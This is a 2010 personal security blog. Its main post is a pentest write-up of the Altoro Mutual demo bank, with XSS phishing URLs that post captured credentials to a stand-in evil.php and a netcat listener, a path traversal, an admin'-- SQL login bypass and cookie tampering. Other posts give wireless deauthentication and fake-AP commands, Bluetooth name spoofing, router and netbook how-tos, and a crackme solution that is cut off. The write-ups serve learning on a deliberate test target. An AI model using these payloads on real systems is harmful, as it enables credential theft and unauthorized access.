eslimasec's blog

A glance at Altoro Mutual

2010-12-12T18:39:00.004-05:00

* Robots.txt file has not been found but error page reveals Microsoft Internet Information Services in Use. Robots file sometimes expose juicy information.

* Server headers provide quite a lot of information: underlying technologies, versions, and a suspicious second cookie named “amSessionId”.

* While performing the test I just gapped by chance in this Google reply that includes the X-XSS-Protection with a 0 value, this causes IE 8 to allow displaying XSS suspicious content. There is a bit of discussion regarding this protection mechanism as it is said to block some benign contents so this is why Google may include this header. The X-Content-Type-Options set to nosniff is another header related to IE8 that helps mitigating certain attacks related to MIME type abuses.

* Sometimes you can get interesting information from contents metadata; in this case for example we see that the images have been edited with Photoshop 3.0. In other occasions one can get usernames and similar stuff to be used in the engagement.

* The main search function is vulnerable to XSS

Here is the cookie, the ASP.NET cookie has not been revealed because of the httponly flag that was set that avoids JavaScript usage of the cookie.

A more elaborated attack can be performed as follows. First inject the following string that will display a fake login page to trick the user (victim).
http://testfire.net/search.aspx?txtSearch=%3Ch1%3EDearest%20user%20please%20provide%20password%20;)%3Ch1%3E%3Cdiv%20background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type=SUBMIT%20value=%22login%22%20/%3E%3C/form%3E%3C/div%3E

We set up a listening socket, with netcat in this example.

The user will then input his user and password.

And the attacker therefore captures them.

If we wanted to provide more impressive results we can start Beef exploitation framework in order to control a victim’s browser.
* The way of the application to locate contents seems vulnerable to path traversal. The application seems to like to server html files but when manipulating the parameter an unfiltered error is displayed with interesting information.
http://demo.testfire.net/default.aspx?content=../../../../../boot.ini.txt

Insecure redirection or remote file inclusion was also tested with no luck
http://demo.testfire.net/default.aspx?content=http://www.deloite.com/index.htm

Here the attack (insecure redirection) seems possible here:
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
Abusing the URL like this
http://demo.testfire.net/disclaimer.htm?url=http://en.wikipedia.org/wiki/Kiwi

* But a warning message appears, which is vulnerable to injection, and we can perform the redirection.
http://demo.testfire.net/disclaimer.htm?url=www.as.com;testfire.net<script>document.location="http://en.wikipedia.org/wiki/Kiwi";</script>

* In the subscription feature they check client side what characters the user is introducing, but no server side leading to an error.

* Therefore by introducing a “’” we have a nice Database error that could derive into a SQL Injection attack.

It seems to be an underlying insert clause but does not respond as expected to Boolean clauses

We could try to perform additional SQL commands by appending a “;drop database” but It wouldn’t be fair for Altoro. Again there is a XSS here.
* Again we have another Cross Site Scripting in a message:
POST http://demo.testfire.net:80/subscribe.aspx
txtEmail=aaa%40mailinator.com<script>alert(document.cookie);</script>&btnSubmit=Subscribe

* They do not mark the field with the autocomplete=off tag, here is not so dangerous but it is in login forms.

* Directory indexing misconfiguration has been located with sensitive information:

* There is a local reference to a file that also reveals a user name:

* In the feedback form there is also another XSS.

* Incomplete web page coding so that the page lacks of functionality, can impact the public image of the Bank. The button does not work as the html form does not have even an action tag definition.

* Login information is transmitted in clear text:

* It reveals when a username is not in the system, it can lead to ease brute forcing attacks on username field.

We see admin works so we just have to concentrate on password

* It seems vulnerable to SQL Injection attack

It is very easy to circumvent login page according to the previous behavior exposed by the web page, we just have to use the following:
· User: “admin’--“ (exclude the double quotes).
· Password: whatever as its going to be ignored because of the “—“ symbols that are meant to comment lines in SQL.
We see we have logged in with admin account:

* By the way an easy password guessing shows us that we can log in with admin/admin credentials.
We see that admin login is in fact an administration menu of the application in which we could change other user’s password and thus log in as them as well.

Changing user password does not seem to work (to avoid abuses from pentesters I guess) but usernames are valuables to access by the “—“ technique.

* There is another directory indexing vulnerability

* There is a web service (not authenticated).
http://demo.testfire.net/bank/ws.asmx

It contains the web service methods definition and the soap messages needed:

This can be attacked to obtain usernames by means of soap messages and possibly performing XML injection attacks
A captcha exists as well to avoid malicious users do brute forcing on the password field with automated tools:

* In the capcha window source code we see a password in an html comment:
Altoro1234

With this info and the capcha number we can successfully login

* A possible XML/XPATH injection exists:

With this we would obtain the first item

By crafting a more complex syntax we would for example find recursively the rest items. The contents are anyway indexed and available:

* Header injection vulnerability exists that allows modifying the page returned by the server.

* Regarding to session management we show below admin and sjoe cookies to detect possible vulnerabilities:
- admin cookie
Cookie: ASP.NET_SessionId=35f2wi55vpoyoyrg0ve54szg; amSessionId=446643804; amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; amUserId=1
- sjoe cookie
Cookie: ASP.NET_SessionId=hvejm345qencll55npbtsqe0; amSessionId=582146246; amUserInfo=UserName=c2pvZSctLQ==&Password=bmFkYQ==; amUserId=100116013; amCreditOffer=CardType=Platinum&Limit=12000&Interest=5.4
We can highlight the following weaknesses:
· Username and password information is resent on every query, this only should happen when login in and the server session context must maintain this information.
· A suspicious amUserId is just used to difference one user from another, see image below.
· Special offers are set on client side by mans of amCreditOffer,CardType and Limit.
· The seemingly hashed information contained in username or password is just a base64 encoding so it is easy to intercept and reverse. (c2pvZSctLQ== is translated to sjoe'--)
* Having logged in as sjoe user we just have to ask for a privileged page like http://demo.testfire.net:80/admin/admin.aspx and modify sjoe amUserId field to set it to admin’s one (1) and we can access that critical page impersonating admin user.

How to Isolate a port in Linksys WRT54G/GL/GS

2010-12-12T18:20:00.003-05:00

Introduction

Linksys routers can be enhanced by great firmwares that enable a lot of interesting/never ending features. So then what are you waiting for for upgrading your linksys box?
There are plenty of documentation on how to do it, this brief tutorial is based on dd-wrt firmware but I’m sure you can achieve similar results in others as well:

What I will explain next is how to isolate a port in the Linksys device, so that a computer connecting to that port will be able to access to the Internet but not see the machines in the rest of ports.

Usefull commands

nvram show #show all config
nvram get <variable> #gets variable content
nvram set <variable>=<value> #sets variable content
nvram set <variable>= #blanks a variable
nvram unset <variable> #erases the variable completely
nvram commit #saves the changes to nvram so they are kept after reseting the router

The architecture

Here you can see how is this type of Linksys device internally:

What we see is that case labels (port numbers that we see in the rear view of the linksys device) do not match with the port numbers that dd-wrt firmware uses internally for them. This means that port 4 (externally) matches with port 0 (internally).

port 5 (internal) leads to the cpu of dd-wrt.
port 4 (internal) connects to the internet.
port 0 (internal) is where we will create the new vlan (vlan2) and will be isolated from the rest of user ports (1-3) and wifi.
port 0 (internal) will indeed need to see port 5 so that the CPU can route the packets to the internet through port 4.

Don't trust me! save your current config

Before changing any configuration following this tutorial I will be nice to you and strongly recommend to backup your config. I guess all firmwares (the original linksys one included) have the facility to backup you current configuration.
so do so!!!

The configuration

The first step is based on the premise that you already have installed dd-wrt in your Linksys/Other router.
Bearing all said before in mind we log into the router by means of telnet or ssh and do the following:

nvram set vlan0ports="3 2 1 5*"
nvram set vlan2ports="0 5"

With this our isolated port "0" will now belong to a new vlan called "vlan2".
The asterisk (*) signifies that the VLAN it is attached to is the default VLAN: if the switch receives a packet on port 5 that is not tagged it is put into the VLAN where the * is configured.
Now its time to define that we want to assign an IP to that vlan so that any computer that connects to that port can define its default gateway as 192.168.2.1 and be able to connect to the internet.

nvram set rc_startup='
ifconfig vlan2 192.168.2.1 netmask 255.255.255.0
ifconfig vlan2 up
'

On some other tutorials similar to this one, they tell you to log into de http configuration menu and configure the ports like this but i think its not required. Do this as well just in case the configuration doesn't work.

Securing/Allowing things a bit

To isolate the port but to the internet we define the following rule in the internal linksys firewall

nvram set rc_firewall='
/usr/sbin/iptables -I FORWARD -i vlan2 -o vlan1 -j ACCEPT
'

The next step is rebooting the device and cross fingers

reboot

Roll back changes/fucking device!!

If you happen to get desperate and you feel you have broken/bricked the router just do the following that will reset your nvram to the default settings

Locate a small button in the rear side of the router and press it with a pen or something similar for at least 10 seconds.

Next steps

If you wanted you could assign the new port/net a dhcp server, but that was not my need.

Troubleshooting

During some test I have been doing I lost connectivity with the web interface, this is when accessing with a web browser the page looked like it was not loading. The solution is the following:

Access the router by means of telnet or ssh.
Restart the http daemon

ps  #look for the pid of the httpd process in order to kill it
kill -9 <httpd_pid>
httpd -h /www #start the proccess again

Try to access now through your browser

Bluetooth & Blackberry

2010-12-12T18:13:00.003-05:00

Introduction

Hi, after so long creating a new post this time I just wanna talk about Bluetooth devices and blackberries...not the fruit huh!
Well in fact I am not sure if I will cover something interesting related to BB (Blackberry) I just will try to
Also have in mind that the bluetooth dongle I am using is a cheap-poor-not-great one.

The hardware

I just have this and will try to see what sort of tweaks and tricks we can perform...yeah the /Rooted ad, it was a great Con that took place in Spain I want to mention in my wiki, didn't hear about it? http://www.rootedcon.es/eng/index.html

The tools

So far a brand new Backtrack 4 seems enough.

Bluetooth dongle id

root@bt:/# tail /var/log/syslog
Apr 10 13:18:36 bt kernel: eth0: no IPv6 routers present
Apr 10 13:21:57 bt kernel: Bluetooth: Core ver 2.15
Apr 10 13:21:57 bt kernel: NET: Registered protocol family 31
Apr 10 13:21:57 bt kernel: Bluetooth: HCI device and connection manager initialized
Apr 10 13:21:57 bt kernel: Bluetooth: HCI socket layer initialized
Apr 10 13:22:04 bt kernel: usb 2-2: new full speed USB device using uhci_hcd and address 2
Apr 10 13:22:04 bt kernel: usb 2-2: device descriptor read/64, error -71
Apr 10 13:22:05 bt kernel: usb 2-2: configuration #1 chosen from 1 choice
Apr 10 13:22:06 bt kernel: Bluetooth: Generic Bluetooth USB driver ver 0.5
Apr 10 13:22:06 bt kernel: usbcore: registered new interface driver btusb


root@bt:/# hciconfig -a
hci0:   Type: USB
BD Address: 00:00:00:00:00:00 ACL MTU: 0:0 SCO MTU: 0:0
DOWN
RX bytes:0 acl:0 sco:0 events:0 errors:0
TX bytes:0 acl:0 sco:0 commands:0 errors:0
//when "upping" the device more info is provided and more commands are accepted and do not time out.
root@bt:/# hciconfig hci0 up
root@bt:/# hciconfig -a
hci0:   Type: USB
BD Address: XX:XX:XX:XX:XX:XX ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:348 acl:0 sco:0 events:11 errors:0
TX bytes:38 acl:0 sco:0 commands:11 errors:0
Features: 0xff 0xff 0x8f 0xf8 0x18 0x18 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'CSR - bc3'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x639 LMP Ver: 1.2 (0x2) LMP Subver: 0x639
Manufacturer: Cambridge Silicon Radio (10)
//seems just a ROM memory is installed
root@bt:/# bccmd -d hci0 chiprev
Chip revision: 0x0015 (BC3-ROM)

//dfutools for managing the firmware do not work
root@bt:/# dfutool -d hci0 archive bt_dongle_orig_firmware.bin
Can't find any DFU devices

We can see the dongle from the picture above is a Cambrige Silicon Radio, with a bluecore 3 firmware

Faking our name

I thought I couldn't as this device wasn't supposed to have writable memory

root@bt:/# hciconfig hci0 name eslimasec
root@bt:/# hciconfig hci0 name
hci0:   Type: USB
BD Address: XX:XX:XX:XX:XX:XX ACL MTU: 192:8 SCO MTU: 64:8
Name: 'eslimasec'

Scanning

root@bt:/# hcitool scan
Scanning ...
XX:XX:XX:XX:XX:XX       BlackBerry 8520

when the device is in listen/waiting mode for other devices to discover it, it reveals this information.

root@bt:/# hcitool info XX:XX:XX:XX:XX:XX
Requesting information ...
BD Address:  XX:XX:XX:XX:XX:XX
Device Name: BlackBerry 8520
LMP Version: 2.1 (0x4) LMP Subversion: 0x12e9
Manufacturer: Cambridge Silicon Radio (10)
Features: 0xbf 0xfe 0x8f 0xfe 0x98 0x19 0x00 0x80
<3-slot packets> <5-slot packets> <encryption> <slot offset>
<timing accuracy> <role switch> <sniff mode> <RSSI>
<channel quality> <SCO link> <HV2 packets> <HV3 packets>
<u-law log> <A-law log> <CVSD> <paging scheme> <power control>
<transparent SCO> <broadcast encrypt> <EDR ACL 2 Mbps>
<EDR ACL 3 Mbps> <enhanced iscan> <interlaced iscan>
<interlaced pscan> <inquiry with RSSI> <extended SCO>
<AFH cap. slave> <AFH class. slave> <3-slot EDR ACL>
<5-slot EDR ACL> <AFH cap. master> <AFH class. master>
<extended features>

BlackBerry (& other devs) Attacks

Scam attack by changing our dongle name.

It was tested that the blackberry devices have a sort of cache that allows them to remember the name of you dongle from the first time you tried to get paired.

//change the name of the dongle to make the user set the code you want, then just ask for info and that pairing message will appear on the victim screen
root@bt:/# hcitool info XX:XX:XX:XX:XX:XX

Great Links

ACPI Power Button

2010-11-27T21:36:00.001-05:00

Objective
In this topic I'll give some hints on '''configuring actions for acpi events

The beginning of the plot
On Monday (24 Nov 2008) my precious EBOX4300 seemed to be turned off, this resulted in this web page again being down...I'm starting to feel I'm not going to get even a poor of 50% of uptime!! :(

After a not so hard research I came up with the cause of the downtime: my housemaid. I noticed that the main power button in front of the machine, when pressed, causes a shut down on it.

With this insecure-for-my-uptime discovery I realized it was time to change this suicidal behaviour on my server.

Identifying ACPI events generated
It's as easy as monitoring the '''/var/log/acpid''' which is the file where the acpi daemon (acpid) writes interesting data. So when issuing this command

tail -f /var/log/acpid

And manually pressing the rear power button We will see something like this on the screen

[Tue Nov 25 21:32:42 2008] received event "button/power PWRF 00000080 0000000d"
[Tue Nov 25 21:32:42 2008] executing action "/etc/acpi/powerbtn.sh"
[Tue Nov 25 21:32:42 2008] BEGIN HANDLER MESSAGES
hola
[Tue Nov 25 21:32:42 2008] END HANDLER MESSAGES
[Tue Nov 25 21:32:42 2008] action exited with status 0
[Tue Nov 25 21:32:42 2008] completed event "button/power PWRF 00000080 0000000d"

Changing the behaviour after an event
As we can see in the last section the '''/etc/acpi/powerbn.sh''' is invoked when pressing the power button.

What I did next was extending/varying the default behaviour like this:

one press of the button: do nothing...ha ha ha ma housemaid now you cannot defeat me!
two consecutive presses of the button: do a backup of the file system to a usb drive
three consecutive presses of the button: do a reboot

The consecutive button press is measured by means of a 1 second interval and implemented by a "non-blocking sleep" and a file that acts as a flag as you can see in the following code.

{{{
#!/bin/sh
# /etc/acpi/powerbtn.sh
# Modified by eslimasec for an ebox4300 backup to a usb drive
# Based on a Herr Groucho script
# Initiates a shutdown when the power button has been
# pressed.
# begin variablas definitions: edit here
USB_DEV=/dev/sda1
MNT_DIR=/mnt/usbdrive
MNT_CMD=/bin/mount
UMNT_CMD=/bin/umount
INTERVAL=1
LOCKDIR=/var/lock
POWEROFF_LOCK=$LOCKDIR/poweroff
TODAY=`date +"%Y%m%d"`
BK_CMD="tar -czpf bk_wavy_$TODAY.tar.gz --exclude=/mnt/usbdrive --exclude=/proc --exclude=/sys --exclude=/var/cache /"
MOUNT_CMD="$MNT_CMD $USB_DEV $MNT_DIR"
UMOUNT_CMD="$UMNT_CMD $USB_DEV"
# end variable definition: end editing
# begin functions declaration
do_backup()
{
        fdisk -l | grep -q /dev/sda1
        if [ $? -eq 0 ]
        then
                $MOUNT_CMD
                cd $MNT_DIR
                echo "Backup starting"
                $BK_CMD
                cd /
                $UMOUNT_CMD
                echo "Backup ended, $USB_DEV unmounted"
        else
                echo "No usb drive located at $USB_DEV"
        fi
}
# end function declaration
# begin of main code
# If powersaved is running, let it process the acpi event
if pidof powersaved; then
        exit 0
fi
if [ ! -e $POWEROFF_LOCK ]
then
        echo "Presseed 1 time"
        echo "pressed_once" > $POWEROFF_LOCK
        {
                sleep 2
                rm -f $POWEROFF_LOCK
        } &
else
        case `cat $POWEROFF_LOCK` in
                pressed_once)
                        echo "Pressed 2 times"
                        echo "pressed_twice" > $POWEROFF_LOCK
                        {
                                sleep 1
                                #if the user pressed the button 3 times we are in poweroff mode and we will skip doing the backup
                                if [ "`cat $POWEROFF_LOCK`" != "pressed_trice" ]
                                then
                                        do_backup
                                        rm -f $POWEROFF_LOCK
                                fi
                        } &
                        ;;
                pressed_twice)
                        echo "Pressed 3 times"
                        echo "pressed_trice" > $POWEROFF_LOCK
                        logger "Reboting system because of button press"
                        if ps -Af | grep -q '[k]desktop' && test -f /usr/bin/dcop
                        then
                                dcop --all-sessions --all-users ksmserver ksmserver logout 0 2 0 && exit 0
                                rm -f $POWEROFF_LOCK
                        else
                                /sbin/reboot
                                rm -f $POWEROFF_LOCK
                        fi
                        ;;
        esac
fi
}}}

I know trice does not exists...who cares!
== Links ==

http://www.mail-archive.com/lug-list@lugmen.org.ar/msg00586.html

A110 Aspire One first experiences

2010-11-27T21:35:00.000-05:00

Introduction
Hello to everyone! in this post I will cover stuff I find interesting about the net book that Santa Claus has brought me for this Christmas because he knows I have been a very decent guy during this year ;-)

The version I have had the following stuff inside:

* 1 GB RAM
* 160 GB hard drive (no SSD type).
* Linux Linpus (a fedora style one)

General impressions
Before purchasing this tinny laptop I did some research and was hesitating whether buying the Acer's one or the Samsung NC10 netbook.

Finally I decided to buy the Aspire One basically because of the price but I would recommend people to wait for a version of Aspire One containing a long lasting battery or buy the Samsungs one as it comes with a 6 cell battery, wireless,bluetooth, bigger screen, etc,etc. Samsungs NC10 costs about 100€ more but as It includes a bigger battery and other details I guess It's worth the price. Apart from this, this is what I think about my netbook:

The price is really attractive, even more the less powerful versions: those ones with solid state disk and 512 MB of RAM. Some people are already hacking the Aspire One to http://tnkgrl.wordpress.com/2008/08/14/modding-the-acer-aspire-one-bluetooth/ upgrade RAM or use normal IDE disks.
The keyboard has a decent size so that I can type without problems, I tried some Asus models and the key buttons were too small for me.
The linux included has all the basic stuff anyone would need (instant communications client, Open Office, web browser) and you can install all things like Skype or The Gimp without any problem.
The fan is a bit noisy sometimes but there are many hints on the internet about how to solve this.
Definitely the thing I dislike is the battery duration, being a 3 cell battery you get an average usage time of 2 hours, as soon as they sell 6 cells batteries with an reasonable price I'll buy one myself.
The design of the notebook is very nice and doesn't look as "cheap-plastic" made like the first Eee-pcs.For the wireless auditors this machine comes with an Atheros AR5006EG that supports monitor mode in Linpus linux, injection mode is also supported but you would need to recompile the wireless module or use something like a Backtrack live CD/live USB.

Problems and Solutions
Grub doesn't let me choose what OS to load
The stupid Aspire One's default Grub didn't let me choose among the OS's I defined in the /boot/grub/grub.conf.

Everybody says RTFM so I did so and there you read to never use grub-install script and better do it through the grub shell. Well root and setup commands aren't enough to fix the boot problem.

I backed up my mbr first and then issued

grub-install /dev/sda

Then I got the normal desired grub behaviour.

I feel the default Grub installed in the netbook is a trimmed one that doesn't have the so called grub stages and therefore Grub behaves strangely because of this.

Divx movies aren't played
In my case mplayer (the media player installed) couldn't handle this type of media files. I had to manually update the player as they weren't any Acer update to do so. As I forgot the steps needed I just point you to this web site http://aspireonelinux.blogspot.com/2008/07/get-mplayer-to-play-your-favorite-video.html

How can I backup linpus?
Acer offers you a dvd that you can use to create a healing boot usb to restore your system to the original state, something not very desirable in case you did important changes to the system you wouldn't like to miss.

In order do a backup of the system I used the versatile program partimage included in System Rescue CD. The advantage of this software is that it gets a full snapshot of your system similarly to what Norton Ghost does. The process is essentially the following:

Create a System Rescue USB drive. http://www.sysresccd.org/Sysresccd-manual-en_How_to_install_SystemRescueCd_on_an_USB-stick

Boot you aspire one and select you want to start the system from the USB and after a few minutes you will be facing the prompt screen of Sysrescue.

Now its time to issue partimage command in order to backup the drive where linpus is installed:

partimage -z1 -d -b save /dev/sda1 sda1_backup

I would suggest to backup your Master Boot Record as well, this can be achieve by using

dd if=/dev/sda of=mbr.bin

The backup process would be finished. Now in case you need to restore the image you previously created following this steps you need to boot with the sysrescue usb again and execute the command.

partimage -z1 -f3 -b restore /dev/sda1 sda1_backup.000

Note, its possible the partimage will warn you about the /dev/sda1 partition not being correct, just ignore this warning. The trailing 000 in the restoration command is because partimage will split files.

How can I update bios?
BIOS updates allow you to have the Aspire Ones fan less noisy, the latest one (by the time of this writing is v3309) comes with a gui that is executable by a Windows XP/BartPE. Thus you don't necessarily have to format your pendrive with freedos as many howtos say.

Aspire One related links

aspireonelinux.blogspot.com/
https://help.ubuntu.com/community/AspireOne
http://jorge.ulver.no/2008/08/06/acer-aspire-one-tips-and-tricks/

Backtrack 3/4 on Acer Aspire One

2010-11-27T21:33:00.002-05:00

Introduction

After getting my netbook what to do next? Hmmm maybe taking advance of its great Atheros card to "play" for a while?? alright!! In this post I will write tips and tricks and howtos to take advance of the Backtrack security distro http://www.remote-exploit.org/backtrack.html for fun.

Contents

Backtrack 3/4 on Acer Aspire One
1. Introduction
2. Links

Installation on a Hard Drive

You can run Backtrack3 from a pendrive as a live cd system without problems but you can also copy it to your hard drive and keep the changes after every reboot.

To do so just follow this howto which I find great: http://kin.calvin.free.fr/blog/?p=16. In my case I kept the boot loader that comes with the Linpus distro installed originally. As you can see in my post about this netbook, Grub has a weird behaviour when you want to boot more than one system (check AspireOnePost).

Having this in mind go to the Grub configuration file that should be on /boot/grub/grub.conf and add the following lines after the Linpus Linux booting parameters, I will also show the parameters for booting Windows in case you also want to install it. Take care with the partition numbers as they dont have to be the same as mine.

default=0
timeout=5
splashimage=(hd0,0)/boot/grub/cbg2.xpm.gz
hiddenmenu

title Linpus Linux
        rootnoverify (hd0,0)
        kernel /boot/bzImage ro root=LABEL=linpus vga=0x311 splash=quiet loglevel=1 console=tty1 nolapic_timer
        initrd /boot/initrd-splash.img

title Backtrack 3
        rootnoverify (hd0,1)
        kernel /boot/vmlinuz ro root=/dev/sda2 vga=0x0F05

title Windous XP
        root (hd0,2)
        makeactive
        chainloader +1

Keep an eye on the grub syntax ((hd0,0) refers to the first partition on the first disk). Thus you can see how Backtrack was installed on the second partition.

Installing Nessus

Fulfill the requirement that you are a home user you can use the Vulnerability Scanner Nessus by doing the following:

Download the Nessus and NessusClient Fedora Core 8 RPM’s from the Nessus website, it's important to choose the Fedora 8 binaries.
Convert them to TGZ

rpm2tgz Nessus-3.2.x-fc8.i386.rpm
rpm2tgz NessusClient-3.2.x-fc8.i386.rpm

Use the pkgtool (in that same directory where you downloaded the client and server) to have a ncurses interface that will install those two packages:

pkgtool

Configure things a bit (put the libraries where appropriate and so on):

cd /opt/
export PATH=$PATH:/opt/nessus/sbin:/opt/nessus/bin:
cp /usr/lib/libssl.so /lib
cp /usr/lib/libcrypto.so /lib
cp /opt/nessus/lib/libnessus.so.3 /lib
cp /opt/nessus/lib/libnessusrx.so.0 /lib
cp /opt/nessus/lib/libpcap-nessus.so.3 /lib
cd /lib
ln libssl.so libssl.so.6
ln libcrypto.so libcrypto.so.6

echo "/opt/nessus/lib" >> /etc/ld.so.conf

ldconfig

Then add your users that can use Nessus (it requires authentication).

/opt/nessus/sbin/nessus-mkcert /opt/nessus/sbin/nessus-adduser

Finally register Nessus and with the key that they will provide you update the plugins this way (note: it takes some time to update all plugins).

cd /opt/nessus/etc/nessus
nessus-fetch  –register XXX-YYY-ZZZ-VVV

To run the server just type

/opt/nessus/sbin/nessusd

The client should be located on your Internet applications menu or in this path:

/opt/nessus/bin/NessusClient

Playing with Wireless

First steps

Aspire one comes with a nice Atheros wireless card and Backtrack3 has the drivers needed to put the card in monitor mode (sniff) or to reinject packets. To use all this functionality you should get used to wlanconfig,airmon-ng, aircrack-ng and aireplay-ng tools.

Starting kismet

First you have to edit its config file and modify the follogin line:

vi /usr/local/etc/kismet.conf
source=madwifi_ag,wifi0,madwifi-ng
#afterwards just launch kismet:
kismet

Kismet will create a dedicated new interface, If you are capturing packets on certain channel with another interface kismet will make trouble and start channel hopping on the other interfaces in use, so take care when running kismet and for example airodump-ng.

Create a new interface with monitor mode enabled

airmon-ng stop ath0
airmon-ng start wifi0

Capturing packets focusing on one AP

airodump-ng --bssid <victim_router_mac> -c <channel_used_by_victim_router> -w <file> <wireless_iface>

Send disasociation frames to a specific client (connected)

aireplay-ng -0 5 -e <ESSID> -a <router_mac> -c <connected_client_mac> <wifi_iface>

Replaying arp packets

In order for the replay to be effective you have to be associated with de ap, you can achieve this by issuing, where fake mac is the mac of an already connected user. Otherwise if you are replaying packets of a non associated client the AP will discard them.

aireplay-ng -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0

Some APs like this format of association

aireplay-ng -1 6000 -o 1 -q 10 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0

Where:

6000 - Reauthenticate every 6000 secs
-o 1 - Send only one type of packet each time, by default different types of association frames are sent that could mislead the AP.
-q 10 - Send keepalive packets every 10 secs. keepalive <> reauthentication

Debuggin network traces with tcpdump

tcpdump -n -e -s0 -vvv -i <iface>

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:
40:80 DeAuthentication: Class 3 frame received from nonassociated station

Connect to a Wep protected network

iwconfig ath0 key <s:ASCII string of key> essid <essid>
dhclient ath0

Startup a fake access point to share your internet access

Modify it for your needs (networks, essid, ips, gw, etc).

LAN == ETH0 (ethernet)
WAN == ATH0 (wireless)
10.0.0.0/24 == ATH0 LAN
192.168.1.0/24 == ETH0 LAN
192.168.1.1 == ETH0 GATEWAY
10.0.0.1 == ATH0 GATEWAY (the Aspire one)

Note: from Backtrack 4 release wlanconfig command to put the wireless card in master or ap mode won't work as by default it will load ath5k driver which doess not support ioctl calls. You can still manage to get a fake ap by using airbase-ng script. Otherwise install by hand the madwifi ath_pci driver http://forums.remote-exploit.org/backtrack-4-non-working-hardware/24348-atheros-ar5007eg-ath_pci-error.html

IPT="/usr/sbin/iptables"
WAN="eth0"
LAN="ath0"

#wifi stuff
echo "destroying atheros ifaces"
wlanconfig ath1 destroy
wlanconfig ath0 destroy
echo "creating ath0 as a master device"
wlanconfig ath0 create wlandev wifi0 wlanmode master
sleep 2
iwconfig ath0 essid HOME
echo "configuring IPs and default route"
ifconfig ath0 10.0.0.1 netmask 255.255.255.0 up
ifconfig eth0 192.168.1.111 netmask 255.255.255.0 up
route add default gw 192.168.1.1
echo "starting dhcp"
/etc/rc.d/rc.dhcpd start
echo "enabling forwarding"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "stablishing IPtables nat rules"
$IPT -t nat -A POSTROUTING -o $WAN -j MASQUERADE

The dhcp server config I used is the following

bt ~ # cat /etc/dhcpd.conf
option domain-name-servers 4.2.2.2;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 4.2.2.2;
}

As you can see I used the local7 facility that I will dump to a separate file I will monitor to check when I have dear guests:

bt ~ # cat /etc/syslog.conf
# /etc/syslog.conf
# For info about the format of this file, see "man syslog.conf"
# and /usr
...
...
....

#
#DHCP LOGS
#
local7.*                                                -/var/log/dhcp.log

Software AP with airbase-ng

Airbase-ng aim is to respond to any probe packet from connecting clients, we can use it to start a fake AP that listens to one essid at a time. Maybe this can be useful to do when you just run backtrack 4 final on aspire one and you see that wlanconfig suite of commands do not work.

//we create a monitor mode interface (mon0 will be created)
airmon-ng start wlan0
//start our fake ap listening on channel 5, beaconing each 100 milliseconds, publising a "test" essid
airbase-ng -I 100 -c 5 --essid test mon0
//at0 inteface will be created like in previous post we can setup a dhcp server so that it listens on at0 interface.

Other stuff

To remove an interface (when wlanconfig stop does not work due to ath5k use) we can achieve like this:

iw dev mon0 interface del

To lock the card to a specific mode, use:

    * iwpriv ath0 mode 11a To lock to 11a only.
    * iwpriv ath0 mode 11b To lock to 11b only.
    * iwpriv ath0 mode 11g To lock to 11g only.
    * iwpriv ath0 mode 0 (default) autoselect mode. 

Changing Authentication Mode.

Use:

    * iwpriv ath0 authmode 1 To use open authentication.
    * iwpriv ath0 authmode 2 To use shared key authentication.
    * iwpriv ath0 authmode 3 To use 802.1x authentication. 

Manipulating the MAC white/black list

Use:

    * iwpriv ath0 maccmd 3 To clear the MAC list.
    * iwpriv ath0 maccmd 1 To make the list a whitelist.
    * iwpriv ath0 maccmd 2 To make the list a blacklist.
    * iwpriv ath0 addmac 00:11:22:33:44:55 To add a mac address to the list.
    * iwpriv ath0 delmac 00:11:22:33:44:55 To delete a mac from the list.
    * iwpriv ath0 kickmac 00:11:22:33:44:55 To send a disassociation frame to an associated station.

I solved a crackme!

2010-11-27T21:25:00.002-05:00

Some days ago after many more days of research and reversing I managed to solve a crackme that a friend of mine (CT) passed to me. This crackme was supposed to be used in a security conference held in Spain called NoConName and was conceived to be presented as the II level of a crackme contest.

Contents

I solved a crackme!

Where to find the crackme?

During the days I was trying to solve the crackme I found a really interesting web portal devoted to crackers (in the good/bad sense ) that is basically a repository of crackmes, solutions, forums ... everything I would ask for a place like this to be.

Thus I have uploaded the crackme there under the name ncn: http://www.crackmes.de/users/eslimasec/ncn/ enjoy it as I did!

Some tips

If you are a beginner as I was/am in the reversing field your best friends for this crackme can be:
- GDB
- Objdump
But I heard that some people haven't even needed to disasemble, in this post I cover a reversing view of solving the crackme.
I have worked quite a lot with the output taken from Objdump, but then I saw It would be easier to use the GDB output (set logging file FILE) because of the relative memory addresses that it uses (main+243) that match more precisely with the output you get when debugging with GDB.
Use breakpoints to see how the program executes
Use watchpoints to check the values that the variables hold over the time
As for every crack there is something that allows you to find the solution and this is ranked as an easy crack
Maybe in certain moments you don't know that the code does but you can anticipate the ranges in the result you will get

My dirty solution

If you are really really fed up and want to see my solution (haven't uploaded to crackmes.de yet as I want people to be interested in solving it as, well) here you have my friend! Sorry that it's an [javascript:void(0);/*1247300948733*/ spanglish] code

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define MAX_STR 1000
//many variables, some of them are written in spanish
int len,newpos,salto,i,j,increase=5,ciphered_index,seed_value,procesed=0;
//cifred = encrypted ;) it will hold the ciphered string
int cifred[MAX_STR];
//reversed= decyphered string
